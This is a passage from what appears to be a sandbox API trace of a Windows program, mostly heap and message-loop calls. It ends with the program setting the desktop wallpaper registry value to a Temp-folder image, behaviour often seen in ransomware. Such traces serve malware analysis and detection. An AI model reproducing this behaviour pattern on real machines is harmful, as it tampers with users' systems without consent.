hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0286.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0286.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14d28 | out: hHeap=0x970000) returned 1 [0286.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0286.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0286.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0286.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0286.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0286.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0286.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0286.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0286.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0286.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0286.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0286.533] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0286.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0286.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0286.533] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0286.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0286.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0286.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0286.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0286.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0286.533] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0286.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0286.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0286.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0286.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0286.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0286.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0286.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0286.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0286.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0286.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0286.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0286.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0286.534] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0286.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0286.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0286.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0286.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0286.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0286.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0286.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0286.534] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0286.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0286.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0286.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0286.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0286.535] timeGetTime () returned 0x1187bec [0286.535] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0286.535] Sleep (dwMilliseconds=0xa) [0286.609] timeGetTime () returned 0x1187c36 [0286.609] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0286.609] TranslateMessage (lpMsg=0x8cf798) returned 0 [0286.609] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0286.609] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0286.609] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0286.609] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0286.609] Sleep (dwMilliseconds=0xa) [0286.681] timeGetTime () returned 0x1187c7f [0286.682] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0286.682] Sleep (dwMilliseconds=0xa) [0286.751] timeGetTime () returned 0x1187cc5 [0286.752] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0286.752] Sleep (dwMilliseconds=0xa) [0286.824] timeGetTime () returned 0x1187d0e [0286.825] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0286.825] Sleep (dwMilliseconds=0xa) [0286.896] timeGetTime () returned 0x1187d56 [0286.897] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0286.897] Sleep (dwMilliseconds=0xa) [0286.966] timeGetTime () returned 0x1187d9c [0286.966] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0286.967] Sleep (dwMilliseconds=0xa) [0287.071] timeGetTime () returned 0x1187e04 [0287.071] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0287.071] Sleep (dwMilliseconds=0xa) [0287.148] timeGetTime () returned 0x1187e52 [0287.148] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0287.148] Sleep (dwMilliseconds=0xa) [0287.188] timeGetTime () returned 0x1187e79 [0287.188] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0287.188] Sleep (dwMilliseconds=0xa) [0287.233] timeGetTime () returned 0x1187ea6 [0287.233] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0287.233] Sleep (dwMilliseconds=0xa) [0287.268] timeGetTime () returned 0x1187ec9 [0287.268] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0287.268] Sleep (dwMilliseconds=0xa) [0287.307] timeGetTime () returned 0x1187ef1 [0287.307] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0287.308] Sleep (dwMilliseconds=0xa) [0287.351] timeGetTime () returned 0x1187f1d [0287.351] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0287.352] TranslateMessage (lpMsg=0x8cf798) returned 0 [0287.352] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0287.352] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0287.352] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0287.352] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0287.352] Sleep (dwMilliseconds=0xa) [0287.486] timeGetTime () returned 0x1187fa3 [0287.486] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0287.486] Sleep (dwMilliseconds=0xa) [0287.524] timeGetTime () returned 0x1187fc9 [0287.524] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0287.524] Sleep (dwMilliseconds=0xa) [0287.559] timeGetTime () returned 0x1187fec [0287.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0287.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0287.559] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0287.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0287.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0287.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0287.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0287.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0287.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0287.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0287.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0287.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0287.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0287.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0287.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0287.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0287.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0287.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0287.560] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0287.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0287.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0287.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0287.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0287.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0287.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0287.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0287.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0287.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0287.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0287.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0287.562] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0287.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0287.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0287.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0287.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0287.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0287.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0287.562] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0287.562] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0287.562] RegCloseKey (hKey=0x2d0) returned 0x0 [0287.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0287.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0287.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0287.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0287.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0287.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0287.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0287.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0287.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0287.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0287.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0287.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0287.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0287.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0287.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0287.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0287.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0287.563] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0287.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0287.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0287.563] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0287.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0287.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0287.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0287.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0287.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0287.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0287.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0287.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0287.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0287.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0287.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0287.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0287.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0287.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0287.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0287.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0287.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0287.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0287.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0287.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0287.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0287.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0287.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0287.565] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0287.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0287.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0287.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0287.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0287.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0287.566] 